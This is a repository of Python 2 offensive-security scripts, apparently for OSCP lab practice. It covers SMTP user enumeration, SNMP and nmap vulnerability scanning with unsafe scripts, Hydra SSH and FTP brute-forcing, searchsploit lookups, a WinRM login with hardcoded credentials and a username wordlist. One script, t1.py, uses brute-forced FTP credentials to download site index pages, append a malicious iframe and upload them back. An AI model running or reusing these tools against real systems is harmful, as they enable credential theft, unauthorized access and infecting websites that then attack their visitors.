-------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | import subprocess 5 | import reconf 6 | from reconf import * 7 | 8 | if len(sys.argv) != 2: 9 | print "Usage: smtprecon.py " 10 | sys.exit(0) 11 | 12 | print "INFO: Trying SMTP Enum on " + sys.argv[1] 13 | names = open(fzzlst, 'r') 14 | for name in names: 15 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | connect=s.connect((sys.argv[1],25)) 17 | banner=s.recv(1024) 18 | s.send('HELO test@test.org \r\n') 19 | result= s.recv(1024) 20 | s.send('VRFY ' + name.strip() + '\r\n') 21 | result=s.recv(1024) 22 | if ("not implemented" in result) or ("disallowed" in result): 23 | sys.exit("INFO: VRFY Command not implemented on " + sys.argv[1]) 24 | if (("250" in result) or ("252" in result) and ("Cannot VRFY" not in result)): 25 | print "[*] SMTP VRFY Account found on " + sys.argv[1] + ": " + name.strip() 26 | s.close() 27 | -------------------------------------------------------------------------------- /snmprecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | import reconf 5 | from reconf import * 6 | 7 | if len(sys.argv) != 2: 8 | print "Usage: snmprecon.py " 9 | sys.exit(0) 10 | 11 | snmpdetect = 0 12 | ip_address = sys.argv[1] 13 | 14 | ONESIXONESCAN = "onesixtyone %s" % (ip_address) 15 | results = subprocess.check_output(ONESIXONESCAN, shell=True).strip() 16 | 17 | if results != "": 18 | if "Windows" in results: 19 | results = results.split("Software: ")[1] 20 | snmpdetect = 1 21 | elif "Linux" in results: 22 | results = results.split("[public] ")[1] 23 | snmpdetect = 1 24 | if snmpdetect == 1: 25 | print "[*] SNMP running on " + ip_address + "; OS Detect: " + results 26 | SNMPWALK = "snmpwalk -c public -v1 %s 1 > %s/%s_snmpwalk.txt" % (ip_address, reconf.rsltpth, ip_address) 27 | results = subprocess.check_output(SNMPWALK, shell=True) 28 | 29 | NMAPSCAN = "nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes %s" % (ip_address) 30 | results = subprocess.check_output(NMAPSCAN, shell=True) 31 | resultsfile = reconf.rsltpth + "/" + ip_address + "_snmprecon.txt" 32 | f = open(resultsfile, "w") 33 | f.write(results) 34 | f.close 35 | -------------------------------------------------------------------------------- /sshrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | import reconf 5 | from reconf import * 6 | 7 | if len(sys.argv) != 3: 8 | print "Usage: sshrecon.py " 9 | sys.exit(0) 10 | 11 | ip_address = sys.argv[1].strip() 12 | port = sys.argv[2].strip() 13 | 14 | print "INFO: Performing hydra ssh scan against " + ip_address 15 | HYDRA = "hydra -L %s -P %s -f -o %s/%s_sshhydra.txt -u %s -s %s ssh" % (reconf.usrlst, reconf.pwdlst, reconf.rsltpth, ip_address, ip_address, port) 16 | try: 17 | results = subprocess.check_output(HYDRA, shell=True) 18 | resultarr = results.split("\n") 19 | for result in resultarr: 20 | if "login:" in result: 21 | print "[*] Valid ssh credentials found: " + result 22 | except: 23 | print "INFO: No valid ssh credentials found" 24 | -------------------------------------------------------------------------------- /support.txt: -------------------------------------------------------------------------------- 1 | https://10.70.70.70/oscpanel/labcpanel.php?md=b65c572dd9b210b3dff52be9b4c7997b&pid=189465&servers=0 2 | https://forums.offensive-security.com/ 3 | -------------------------------------------------------------------------------- /t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import scapy 4 | from scapy.all import * 5 | 6 | output=sr(IP(dst='192.168.31.204')/ftp()) 7 | print "0: %s" % output 8 | result, unan=output 9 | print "R: %s" % result 10 | -------------------------------------------------------------------------------- /t1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import subprocess 4 | import multiprocessing 5 | from multiprocessing import * 6 | import os 7 | import sys 8 | import re 9 | import reconf 10 | from reconf import * 11 | import time 12 | from functools import wraps 13 | import argparse 14 | import ipaddr 15 | import nmapxml 16 | from nmapxml import * 17 | import ftputil 18 | 19 | parser = argparse.ArgumentParser(description='Scan for FTP websites using creds discovered with hydra, search for index files append malicous code into it, then upload it back') 20 | parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed') 21 | 22 | args = parser.parse_args() 23 | try: 24 | ip_address = ipaddr.IPAddress(args.ip) 25 | except: 26 | print "Try again..." 27 | sys.exit() 28 | 29 | ip_address = str(ip_address) 30 | 31 | def ftpLogin(ip_address, u, p): 32 | try: 33 | ftp = ftputil.FTPHost(ip_address, u, p) 34 | print "[+] %s - FTP using %s/%s is Permitted" % (ip_address, u, p) 35 | return(ftp) 36 | except OSError as error: 37 | print "[-] %s - FTP using creds %s:%s is not allowed" % (ip_address, u, p) 38 | pass 39 | return 40 | 41 | def injectPage(fname): 42 | try: 43 | print "Inserting code into %s" % fname 44 | f = open(("%s" % fname), 'a') 45 | f.write(reconf.iframe1) 46 | f.close() 47 | finally: 48 | pass 49 | 50 | fnmap = "%s/%s_ftp_hydra.txt" % (reconf.rsltpth, ip_address) 51 | try: 52 | with open(fnmap) as ft: 53 | print "\033[1;31m [!] \033[0;m Checking if %s exists" % (fnmap) 54 | except: 55 | print "\033[1;31m [!] \033[0;m %s doesn't exists, running brute force to find creds" % (fnmap) 56 | BRUTEUS = "./brutepwd.py -ip %s -s ftp -hy" % ip_address 57 | try: 58 | if os.path.isfile('hydra.restore'): 59 | os.remove('hydra.restore') 60 | subprocess.call(BRUTEUS, shell=True) 61 | except subprocess.CalledProcessError: 62 | pass 63 | except OSError: 64 | pass 65 | finally: 66 | print "\033[1;31m [!] \033[0;m Brute force of %s is completed." % (ip_address) 67 | pass 68 | 69 | try: 70 | fnmap = "%s/%s_ftp_hydra.txt" % (reconf.rsltpth, ip_address) 71 | print "\033[1;31m [!] \033[0;m Parsing %s for creds" % (fnmap) 72 | seenusrpwd = set() 73 | with open(fnmap, 'r') as searchfile: 74 | for line in searchfile: 75 | if 'login:' in line and 'password:' in line: 76 | u = re.split('\s+', line)[4].strip() 77 | p = re.split('\s+', line)[6].strip() 78 | usrpwd = "%s:%s" % (u, p) 79 | if usrpwd not in seenusrpwd: 80 | print "\033[1;31m [!] \033[0;m Using %s creds to FTP into %s" % (usrpwd, ip_address) 81 | seenusrpwd.add(usrpwd) 82 | ftp = ftpLogin(ip_address, u, p) 83 | try: 84 | recursive = ftp.walk("/",topdown=True,onerror=None) 85 | for root,dirs,files in recursive: 86 | for dlst in dirs: 87 | results = "%s\n" % dlst 88 | if dlst != "": 89 | #f.write(results) 90 | print results 91 | for fname in files: 92 | results = "%s/%s\n" % (root, fname) 93 | if fname != "": 94 | #f.write(results) 95 | print results 96 | if re.search(r'^(index)[.](htm|html|asp|php)', fname): 97 | print "[+] Found default page %s at %s" % (fname, root) 98 | try: 99 | print "Downloading %s with U %s P %s" % (fname, u, p) 100 | ftp.download(("%s/%s" % (root, fname)), fname) 101 | injectPage(fname) 102 | ftp.upload_if_newer(fname, ("%s/%s" % (root, fname))) 103 | except: 104 | pass 105 | except: 106 | pass 107 | except: 108 | pass 109 | finally: 110 | print "\033[1;31m [!] \033[0;m Assessment Complete." 111 | -------------------------------------------------------------------------------- /users.txt: -------------------------------------------------------------------------------- 1 | root 2 | abe 3 | admin 4 | Administrator 5 | alice 6 | anonymous 7 | backup 8 | bin 9 | bob 10 | daemon 11 | david 12 | dhcp 13 | games 14 | gary 15 | gnats 16 | Guest 17 | HelpAssistant 18 | irc 19 | IEuser 20 | IUSR_BOB 21 | IUSR_ORACLE 22 | IUSR_SRV2 23 | IWAM_BOB 24 | IWAM_ORACLE 25 | IWAM_SRV2 26 | joe 27 | john 28 | klog 29 | lisa 30 | list 31 | loneferret 32 | lp 33 | main 34 | man 35 | mark 36 | mysql 37 | ned 38 | news 39 | nick 40 | nobody 41 | postfix 42 | proxy 43 | sqlusr 44 | sshd 45 | SUPPORT_388945a0 46 | sync 47 | sys 48 | syslog 49 | todd 50 | TsInternetUser 51 | uucp 52 | www-data 53 | -------------------------------------------------------------------------------- /vulnrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from xml.etree import ElementTree 3 | from libnmap.parser import NmapParser 4 | import subprocess 5 | from subprocess import * 6 | import sys 7 | import os 8 | import re 9 | import reconf 10 | from reconf import * 11 | 12 | if len(sys.argv) != 2: 13 | print "Usage: vulnrecon.py " 14 | sys.exit(0) 15 | 16 | ip_address = sys.argv[1].strip() 17 | 18 | def opnPORTS(ip_address): 19 | try: 20 | fnmap = "%s/%s.nmap" % (reconf.exampth, ip_address) 21 | print "\033[1;31m [!] \033[0;m Parsing %s for identifying open ports" % (fnmap) 22 | if os.path.isfile(fnmap): 23 | CATS = "cat %s | grep open | cut -d'/' -f1 | sort -h | tr '\n' ','" % (fnmap) 24 | results = subprocess.check_output(CATS, shell=True) 25 | results = results.rstrip(',') 26 | else: 27 | print "\033[1;38m [!] \033[0;m %s is missing. Run nmap with the -oA option" % (fnmap) 28 | return results 29 | except: 30 | pass 31 | 32 | def vulnCHK(ip_address): 33 | try: 34 | oprts = opnPORTS(ip_address) 35 | if not re.search('Warning', oprts): 36 | VCHK = "nmap -sV -vv -Pn -n -p %s --script vuln --script-args=unsafe=1 -oA '%s/%s_vuln' %s" % (oprts, reconf.exampth, ip_address, ip_address) 37 | print "[+] Executing - %s" % (VCHK) 38 | else: 39 | VCHK = "nmap -sV -vv -Pn -n --script vuln --script-args=unsafe=1 -oA '%s/%s_vuln' %s" % (reconf.exampth, ip_address, ip_address) 40 | print "[+] Executing - %s" % (VCHK) 41 | 42 | print "\033[1;33m[*]\033[0;m Running general vuln scans for " + ip_address 43 | subprocess.call(VCHK, shell=True) 44 | except: 45 | pass 46 | 47 | def test_patterns(text, patterns=[]): 48 | # Look for each pattern in the text and print the results 49 | for pattern in patterns: 50 | for match in re.finditer(pattern, text): 51 | s = match.start() 52 | e = match.end() 53 | return (int(s), int(e)) 54 | 55 | def prodreplace(text): 56 | tags = ['windows','xp','98','2000','enterprise edition','http server powered by','transaction coordinator','for','httpd','listener','service','release'] 57 | for tag in tags: 58 | if tag in text: 59 | return (text.replace(tag, '')) 60 | 61 | def osreplace(text): 62 | tags = ['windows','enterprise edition release'] 63 | for tag in tags: 64 | if tag in text: 65 | return (text.replace(tag, '')) 66 | 67 | def ssploit(prod,ver,os): 68 | if re.search('rdp',prod): 69 | if re.search('windows',os): 70 | SPLOIT = "searchsploit %s %s" % (prod,os) 71 | else: 72 | SPLOIT = "searchsploit %s %s" % (prod,ver) 73 | APLOIT = "%s|%s" % (prod,ver) 74 | OPLOIT = "searchsploit %s %s" % (prod,os) 75 | AOLOIT = "%s|%s" % (prod,os) 76 | try: 77 | results = subprocess.check_output(SPLOIT, shell=True) 78 | if re.search(APLOIT, results): 79 | return results 80 | else: 81 | results = subprocess.check_output(OPLOIT, shell=True) 82 | if re.search(AOLOIT, results): 83 | return results 84 | except: 85 | print "[!]: No exploits found for %s %s" % (prod, ver) 86 | 87 | vulnCHK(ip_address) 88 | 89 | xmlfile = "%s/%s.xml" % (reconf.exampth, ip_address) 90 | with open (xmlfile, 'rt') as file: 91 | tree = ElementTree.parse(file) 92 | 93 | rep = NmapParser.parse_fromfile(xmlfile) 94 | for _host in rep.hosts: 95 | host = ', '.join(_host.hostnames) 96 | 97 | if _host.os.osmatches: 98 | for osmatch in _host.os.osmatches: 99 | os = osmatch.name 100 | else: 101 | os = "Linux" 102 | 103 | if re.match('Microsoft|Windows', os): 104 | for services in _host.services: 105 | prod = '' 106 | ver = '' 107 | os = '' 108 | serv = services.banner 109 | serv = serv.replace('Microsoft ', '') 110 | if serv: 111 | if 'product' in serv and 'version' in serv and 'ostype' in serv and 'extrainfo' in serv: 112 | sp, pe = test_patterns(serv, ['product:']) 113 | sv, ve = test_patterns(serv, ['version:']) 114 | so, oe = test_patterns(serv, ['ostype:']) 115 | se, ee = test_patterns(serv, ['extrainfo:']) 116 | prod = serv[pe:(sv-1)].strip().lower() 117 | ver = serv[ve:(se-1)].strip().lower() 118 | ex = serv[ee:se-1].strip().lower() 119 | os = serv[oe:].strip().lower() 120 | if services.port == 443: 121 | prod = "https" 122 | os = "windows" 123 | if re.search('microsoft-ds', prod) and services.port == 445: 124 | prod = "smb" 125 | if re.search('netbios-ssn', prod) and services.port == 139: 126 | prod = "netbios" 127 | if re.search('tns', prod) and services.port == 1521 or services.port == 1526: 128 | prod = "tns" 129 | if re.search('apache', prod) and services.port == 7777 or services.port == 7778: 130 | prod = "apache" 131 | if re.search('terminal', prod) and services.port == 3389: 132 | prod = "rdp" 133 | if len(prod.split()) > 1: 134 | prod = prodreplace(prod).strip() 135 | if len(ver.split('.')) > 2: 136 | i = iter(ver.split('.')) 137 | ver = map('.'.join,zip(i,i))[0] 138 | if len(os.split()) > 1: 139 | i = iter(os.split()) 140 | os = map(''.join,zip(i,i))[0] 141 | os = osreplace(os).strip() 142 | if 'product' in serv and 'version' in serv and 'ostype' in serv and not 'extrainfo' in serv: 143 | sp, pe = test_patterns(serv, ['product:']) 144 | sv, ve = test_patterns(serv, ['version:']) 145 | so, oe = test_patterns(serv, ['ostype:']) 146 | prod = serv[pe:(sv-1)].strip().lower() 147 | ver = serv[ve:(so-1)].strip().lower() 148 | os = serv[oe:].strip().lower() 149 | if services.port == 443: 150 | prod = "https" 151 | os = "windows" 152 | if re.search('microsoft-ds', prod) and services.port == 445: 153 | prod = "smb" 154 | if re.search('netbios-ssn', prod) and services.port == 139: 155 | prod = "netbios" 156 | if re.search('tns', prod) and services.port == 1521 or services.port == 1526: 157 | prod = "tns" 158 | if re.search('terminal', prod) and services.port == 3389: 159 | prod = "rdp" 160 | if len(prod.split()) > 1: 161 | prod = prodreplace(prod).strip() 162 | if len(ver.split('.')) > 2: 163 | i = iter(ver.split('.')) 164 | ver = map('.'.join,zip(i,i))[0] 165 | if len(os.split()) > 1: 166 | os = osreplace(os).strip() 167 | if 'product' in serv and 'ostype' in serv and not 'version' in serv and not 'extrainfo' in serv: 168 | sp, pe = test_patterns(serv, ['product:']) 169 | so, oe = test_patterns(serv, ['ostype:']) 170 | prod = serv[pe:(so-1)].strip().lower() 171 | os = serv[oe:].strip().lower() 172 | if services.port == 443: 173 | prod = "https" 174 | os = "windows" 175 | if re.search('microsoft-ds', prod) and services.port == 445: 176 | prod = "smb" 177 | if re.search('netbios-ssn', prod) and services.port == 139: 178 | prod = "netbios" 179 | if re.search('tns', prod) and services.port == 1521 or services.port == 1526: 180 | prod = "tns" 181 | if re.search('terminal', prod) and services.port == 3389: 182 | prod = "rdp" 183 | if len(prod.split()) > 1: 184 | prod = prodreplace(prod).strip() 185 | if len(os.split()) > 1: 186 | os = osreplace(os).strip() 187 | ver = "" 188 | if 'product' in serv and 'version' in serv and 'extrainfo' in serv and not 'ostype' in serv: 189 | sp, pe = test_patterns(serv, ['product:']) 190 | sv, ve = test_patterns(serv, ['version:']) 191 | se, ee = test_patterns(serv, ['extrainfo:']) 192 | prod = serv[pe:(sv-1)].strip().lower() 193 | ver = serv[ve:(se-1)].strip().lower() 194 | ex = serv[ee:].strip().lower() 195 | if re.search('microsoft-ds', prod) and services.port == 445: 196 | prod = "smb" 197 | if re.search('netbios-ssn', prod) and services.port == 139: 198 | prod = "netbios" 199 | if re.search('tns', prod) and services.port == 1521 or services.port == 1526: 200 | prod = "tns" 201 | if re.search('terminal', prod) and services.port == 3389: 202 | prod = "rdp" 203 | if re.search('oracle', ex): 204 | prod = prodreplace(ex).strip() 205 | if len(prod.split()) > 1: 206 | prod = prodreplace(prod).strip() 207 | if len(ver.split('.')) > 2: 208 | i = iter(ver.split('.')) 209 | ver = map('.'.join,zip(i,i))[0] 210 | os = "windows" 211 | if 'product' in serv and 'version' in serv and 'hostname' in serv: 212 | sp, pe = test_patterns(serv, ['product:']) 213 | sv, ve = test_patterns(serv, ['version:']) 214 | so, oe = test_patterns(serv, ['hostname:']) 215 | prod = serv[pe:(sv-1)].strip().lower() 216 | ver = serv[ve:(so-1)].strip().lower() 217 | os = serv[oe:].strip().lower() 218 | if services.port == 443: 219 | prod = "https" 220 | os = "windows" 221 | if re.search('microsoft-ds', prod) and services.port == 445: 222 | prod = "smb" 223 | if re.search('netbios-ssn', prod) and services.port == 139: 224 | prod = "netbios" 225 | if re.search('tns', prod) and services.port == 1521 or services.port == 1526: 226 | prod = "tns" 227 | if re.search('ftpd', prod) and services.port == 2100: 228 | prod = "ftp" 229 | if re.search('terminal', prod) and services.port == 3389: 230 | prod = "rdp" 231 | if len(prod.split()) > 1: 232 | prod = prodreplace(prod).strip() 233 | if len(ver.split('.')) > 2: 234 | i = iter(ver.split('.')) 235 | ver = map('.'.join,zip(i,i))[0] 236 | if len(os.split()) > 1: 237 | i = iter(os.split()) 238 | os = map(''.join,zip(i,i))[0] 239 | os = osreplace(os).strip() 240 | else: 241 | if services.port == 443: 242 | prod = "https" 243 | os = "windows" 244 | else: 245 | prod = "" 246 | ver = "" 247 | os = "windows" 248 | 249 | print "[+] Performing searchsploit on Port: "'{0: <5}'.format(services.port), "Prod: "'{0: <15}'.format(prod), "Version: "'{0: <15}'.format(ver), "OS: "'{0: <15}'.format(os) 250 | 251 | if os and prod or ver: 252 | result = ssploit(prod, ver, os) 253 | ofile = "%s/%s_exploitdb.txt" % (reconf.exampth,ip_address) 254 | rhead = "\n IP Address: %s Port: %s \n" % (ip_address,services.port) 255 | try: 256 | with open(ofile, 'a') as file: 257 | file.write(rhead) 258 | file.write(result) 259 | except: 260 | print "ERROR: Couldn't write to %s" % (ofile) 261 | -------------------------------------------------------------------------------- /winrmrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import winrm 4 | 5 | s = winrm.Session('192.168.31.216', auth=('IEuser', 'toor')) 6 | r = s.run_cmd('ipconfig', ['/all']) 7 | 8 | print r.status_code 9 | print r.std_out 10 | print r.std_err 11 | --------------------------------------------------------------------------------